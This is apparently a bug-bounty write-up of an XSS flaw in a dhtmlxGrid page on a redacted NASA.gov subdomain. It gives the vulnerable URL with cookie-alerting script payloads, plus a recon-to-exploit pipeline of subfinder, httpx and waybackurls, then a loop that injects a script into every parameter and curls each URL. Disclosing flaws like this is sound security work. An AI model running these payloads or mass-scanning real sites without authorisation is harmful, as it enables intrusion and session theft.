Stored XSS Found in Query Parameters of dhtmlxGrid.js on NASA.gov Subdomain (P3)

October 10, 2024
By ALEENS

Introduction

Stored Cross-Site Scripting (XSS) is a critical security vulnerability that occurs when an application accepts and stores untrusted data, which is later served to users without proper validation or sanitization. This flaw allows attackers to inject malicious scripts into web pages that are then executed when viewed by other users.

During a security assessment of the XXX.gov subdomain, I discovered a stored XSS vulnerability in the query parameters of a specific page. This issue poses various risks to users and the integrity of the application.

Vulnerable URL

Here is the URL where the stored XSS vulnerability was found:

https://xxxx.xxxx.gov/GLOBE/dhtmlxGrid.jsp?mode="%3E%3Cscript%3Ealert%28ALEENS_CODE%29%3C%2Fscript%3E&result_type="%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&table="%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

Potential Impact of XSS Vulnerabilities:

Stored XSS can have severe consequences, including:

Session Hijacking: Attackers can steal session cookies, impersonating legitimate users.Data Theft: Sensitive information can be exfiltrated to the attacker’s server.Malicious Redirection: Users can be redirected to harmful websites.Defacement: Attackers can alter the appearance and functionality of the web application.

Methodology

The vulnerability was discovered using the following steps:

Subdomain Discovery
We began by identifying all subdomains related to XXX.gov using Subfinder. The following command was used:subfinder -d XXX.gov -o Subs01.txt

2. Website Status Verification
Next, we verified which subdomains were active using httpx, a fast HTTP toolkit:

cat Subs01.txt | httpx -o AlliveSubs_XXXX.txt

3. Wayback Machine URL Extraction
To uncover historical URLs that may still be live, we leveraged the Wayback Machine:

cat AlliveSubs_XXXX.txt | waybackurls | tee urls_globe.txt

4. Parameter Extraction
We then extracted parameters from the URLs to identify potential vectors for attack:

cat urls_XXXX.txt | grep '=' | tee param_urls.txt

5. XSS Vulnerability Testing
Finally, we tested the extracted parameters for XSS vulnerabilities. Using a specific payload designed to trigger an alert with document cookies, we executed:

cat param_sub_nasa.txt | grep '=' | qsreplace '"><script>alert(document.cookie)</script>' | while read -r url; do
curl -s "$url" | grep -q "alert" && echo "[XSS Found] $url"; done

6. XSS Discovery

During this testing phase, we discovered an active XSS vulnerability in one of the subdomains.

The methodology outlined above provides a structured approach to subdomain enumeration and vulnerability assessment, particularly for XSS. The discovery underscores the importance of conducting thorough security testing on web applications to identify and mitigate potential threats.

Severity Level: HighCVSS 3.1 Score: 7.5 (High)